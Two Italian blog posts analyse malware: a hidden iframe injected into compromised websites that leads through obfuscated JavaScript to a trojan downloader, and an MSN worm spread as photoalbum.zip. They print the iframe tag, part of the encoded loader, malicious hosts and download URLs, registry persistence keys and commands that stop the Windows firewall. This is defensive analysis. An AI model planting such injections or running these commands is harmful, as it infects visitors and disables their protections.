apr
30
Il mio sito veicola trojan?
Author - Filed Under Virus, Trojans & Worms, Web & Internet
In giro per i forum in questi giorni ho visto qualche discussione con un unico denominatore comune: le pagine web erano state alterate inserendo subito dopo il tag un tag di questo tipo:
{iframe src=’hllp://58.65.239.180/’ width=’1′ height=’1′ style=’visibility: hidden;’}{/iframe}
L’inserimento nelle pagine web avviene probabilmente grazie a qualche vulnerabilità, del sito hoster o degli script delle pagine web stesse, ma comunque avvenga trasforma il sito “infettato” in un sito capace di veicolare trojan.
Vediamo come funziona in dettaglio
L’iframe che viene creato con quel tag nella pagina web è di dimensioni microscopiche, in modo da non essere visibile. Esso carica in quella pagina web il contenuto del link, che nel momento in cui scriviamo contiene un codice javascript cammuffato.
Il codice è questo:
{SCRIPT LANGUAGE=”Javascript”}
function v4635e7a4add36(v4635e7a4af7e0){ var v4635e7a4b26b4=16; return(parseInt(v4635e7a4af7e0,v4635e7a4b26b4));}function v4635e7a4b4a52(v4635e7a4b5193){ function v4635e7a4b6920 () {var v4635e7a4b7113=2; return v4635e7a4b7113;} var v4635e7a4b595b=”;for(v4635e7a4b6141=0; v4635e7a4b6141 v4635e7a4b5193.length; v4635e7a4b6141+=v4635e7a4b6920()){ v4635e7a4b595b+=(String.fromCharCode(v4635e7a4add36(v4635e7a4b5193.substr(v4635e7a4b6141, v4635e7a4b6920()))));}return v4635e7a4b595b;} document.write(v4635e7a4b4a52(’0D0A3C494652414D45207374796C…;{/script}
Apparentemente il significato è oscuro, ma basta eseguirlo per vedere a cosa serve. Esso infatti, con modalità simili a quella delle scatole cinesi, apre a sua volta sei iframe secondo l’immagine sottostante:
Ciascuno di questi iframe porta il link ad una pagina web del sito. Se ne apriamo una, ad esempio la prima, vedremo che il codice php genera un codice javascrip cammuffato anch’esso. Una volta decodificato il codice appare così:
Come vediamo adesso è tutto molto più chiaro 
lo scopo infatti è semplice: far scaricare il file hllp://64.62.137.149/~edit/it/load.exe ed eseguirlo sul PC del visitatore. Le altre pagine php richiamate dagli altri iframe hanno lo stesso scopo, cambia solo il javascript generato.
Ovviamente il file load.exe è un trojan downloader, che si installerà sul nostro computer se non abbiamo un antivirus che lo riconosce. Qui è l’analisi di quel file su www.virustotal.com
AhnLab-V3 –> no virus found
AntiVir –> TR/Dldr.Nurech.AZ.5
Authentium –> no virus found
Avast –> Win32:Nurech-AF
AVG –> Downloader.Generic4.FYI
BitDefender –> no virus found
CAT-QuickHeal –> no virus found
ClamAV devel—> Trojan.Downloader-5950
DrWeb –> Trojan.DownLoader.21558
eSafe –> no virus found
eTrust-Vet –> no virus found
Ewido –> no virus found
FileAdvisor –> no virus found
Fortinet –> no virus found
F-Prot –> – no virus found
F-Secure –> Trojan-Downloader.Win32.Nurech.az
Ikarus –> Trojan-Downloader.Win32.Nurech.az
Kaspersky –> Trojan-Downloader.Win32.Nurech.az
McAfee –> Downloader-BBS
Microsoft –> TrojanDownloader:Win32/Agent.XC
NOD32v2 –> a variant of Win32/TrojanDownloader.Nurech.NAT
Norman –> W32/DLoader.CRDC
Panda –> no virus found
Prevx1 –> Polynomial.Code.Exploit
Sophos –> no virus found
Sunbelt –> no virus found
Symantec –> Downloader
TheHacker –> no virus found
VBA32 –> Trojan.DownLoader.21558
VirusBuster –> no virus found
Webwasher-Gateway –> Trojan.Dldr.Nurech.AZ.5
apr
3
photoalbum.zip
Author - Filed Under Virus, Trojans & Worms, Web & Internet
Nelle ultime settimane, questo file è particolarmente diffuso via MSN.
L’utente che si infetta, involontariamente spedisce ai suoi contatti dei messaggi che invitano a scaricare il file photoalbum.zip
I messaggi variano a seconda dei casi:
Una volta scaricato l’archivio e decompresso ci troviamo davanti il file photoalbum007.pif.
Dimensione file:circa 25000 bytes
decompresso circa 70000 bytes
Il file ha estensione .pif ed è compresso con eXPressor.
Il malware è compilato con Microsoft Visual C++
Eseguito il file, si creerà la dll C:\Windows\System32\rdihost.dll
La dll si inietterà nel processo explorer.exe
Si aggiungerà l’archivio C:\Windows\photo album.zip, l’archivio sarà inviato ai vari contatti presenti in MSN
La dll, si connette ad un determinato canale IRC per ricevere comandi da remoto tuttavia, il canale non sembra completamente attivo
lol lol lol :shadowbot2
free8.biz(91.121.20.160) sulla porta 8080
Vengono create le seguenti chiavi per assicurarsi che il malware venga eseguito ad ogni avvio di windows
HKEY_CLASSES_ROOT\CLSID\{Random CLSID}
HKEY_CLASSES_ROOT\CLSID\{Random CLSID}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
rdihost REG_SZ {Random CLSID}
Il malware esegue i seguenti comandi per disattivare il firewall di windows e il centro sicurezza.
net stop “Security Center”
net stop SharedAccess
Viene modificato il valore Epoch nella chiave
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch
Il malware crea il Mutex suckmydick:pomgfuckingstupidgay!!! per evitare di avere più copie attive del malware in memoria
Il malware doveva creare e modificare anche altre chiavi, forse per qualche errore nel codice queste chiavi non vengono create.
Nel codice sono presenti queste stringhe alcune sono riferite alla creazione dei thread:
e5d972968afa2721d683b61a0d237b54
imstart
sp2f
pstore
Skysyn
Msnfuck
Lucass & BilloKenobi